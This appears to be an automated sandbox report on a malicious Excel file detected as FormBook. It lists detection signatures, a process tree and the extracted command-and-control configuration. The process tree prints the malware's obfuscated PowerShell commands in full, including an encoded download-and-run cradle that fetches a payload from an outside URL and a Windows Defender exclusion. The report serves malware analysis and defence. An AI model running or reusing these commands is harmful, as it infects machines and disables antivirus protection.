Windows
Analysis Report
PO.78NO9.xls
Overview
General Information
Detection
FormBook
Score | Range | Whitelisted | Confidence |
---|---|---|---|
100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign process
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3524, cmdline: `"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding`, MD5: D53B85E21886D2AF9815C377537BCAC3)
- WINWORD.EXE (PID: 3792, cmdline: `"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding`, MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- EQNEDT32.EXE (PID: 3168, cmdline: `"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding`, MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- wscript.exe (PID: 3316, cmdline: `"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS"`, MD5: 979D74799EA6C8B8167869A68DF5204A)
- powershell.exe (PID: 2660, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD`, MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- powershell.exe (PID: 1368, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"`, MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- aspnet_regbrowsers.exe (PID: 2452, cmdline: `"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"`, MD5: 04AA198D72229AEED129DC20201BF030)
- powershell.exe (PID: 2980, cmdline: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"`, MD5: EB32C070E658937AA9FA9F3AE629B2B8)
- schtasks.exe (PID: 3328, cmdline: `"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"`, MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
- aspnet_regbrowsers.exe (PID: 3760, cmdline: `"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"`, MD5: 04AA198D72229AEED129DC20201BF030)
- explorer.exe (PID: 1244, cmdline: `C:\Windows\Explorer.EXE`, MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
- taskeng.exe (PID: 2416, cmdline: `taskeng.exe {6F06CFDC-8B46-4289-9A59-403AE8C9352A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]`, MD5: 65EA57712340C09B1B0C427B4848AE05)
- niLILOT.exe (PID: 3724, cmdline: `C:\Users\user\AppData\Roaming\niLILOT.exe`, MD5: 04AA198D72229AEED129DC20201BF030)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
{"C2 list": ["www.lefeetlab.net/gwdv/"], "decoy": ["boyxlife.cyou", "v9.delivery", "intelliflow.run", "gstech.cloud", "qzbqtu.cyou", "splunk-test.dev", "nasocnite.xyz", "outdooradventuregearhub511.shop", "uptobisone.website", "andyouwannafuck.cloud", "blancslatespeedshop.com", "technical.cash", "highercall.net", "incronizid.dev", "tzx9y.rest", "brakpanbrand.net", "stimna.love", "thefarmerzpizza.info", "full4d.net", "lingerie-16071.bond", "ouc24.buzz", "spanish-classes-13883.bond", "slhub.xyz", "redcampgear.shop", "prefabricated-homes-48151.bond", "senior-dating-73474.bond", "betnirmala.pro", "xdns.dev", "nvpvr.info", "my-tournament.live", "20040523.xyz", "tb4r.net", "papayan.xyz", "longbeibusiness.life", "workweek.world", "besuperclinic.com", "online-dating-68375.bond", "yourdentalcare.shop", "seo7x.digital", "back-pain-treatment-11921.bond", "hme8h3f.shop", "cip138max.site", "bet-flix.live", "lmodt.info", "m-tb-zy.shop", "ylu8g260nq.cyou", "victorygameconsiderations.homes", "accountingcourse06.shop", "blackwavetattoostudio.com", "divineworks.store", "momomooncakes.net", "kemari.click", "3rhis.shop", "familyswim.xyz", "pp557.vip", "3dnu3uix.college", "massage-courses-infinity.sbs", "jandjacres.net", "dental-implants-84866.bond", "mahjowefvvcne.space", "inkalternatif188bet.net", "birthinjurylawyers825880.online", "yycvoc.sbs", "mdnews.tech"]}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen | | |
INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen | | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook | Yara detected FormBook | Joe Security | | |
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | | |
Windows_Trojan_Formbook_1112e116 | unknown | unknown | | |
Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | | |
Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | | |
Exploits
- Author: Joe Security
- Author: Joe Security
System Summary
- Author: Florian Roth (Nextron Systems)